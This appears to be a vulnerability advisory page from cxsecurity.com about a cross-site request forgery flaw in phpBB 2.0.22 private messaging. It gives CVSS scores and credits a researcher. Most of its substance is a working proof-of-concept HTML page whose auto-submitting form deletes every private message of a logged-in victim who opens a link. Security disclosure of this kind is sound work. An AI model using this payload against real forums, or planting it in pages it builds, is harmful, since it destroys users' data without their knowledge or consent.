phpBB 2.0.22 Remote PM Delete XSRF Vulnerability

2008.01.29
Credit: NBBN
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

################################################################ phpBB 2.0.22 Remote PM Delete XSRF Vulnerability by NBBN Type: Cross-Site Request Forgery Founded: December 2007 ################################################################ An attacker can send a link via pm to a site with the follow html code to a victim and all victim's pm's are going to be deleted when he click the link. ######Code########################################################## <html> <head> </head> <body onLoad=javascript:document.xsrf.submit()> <form action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post" name="xsrf"> <input type="hidden" name="mode" value="" /> <input type="hidden" name="deleteall" value="true" /> <input type="hidden" name="confirm" value="Yes"> </body> </html> ##################################################################### ######Vuln Versions:##################### I've tested it only on 2.0.22 but I think that all versions of 2 are vuln. (Sorry my bad english :-) )


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top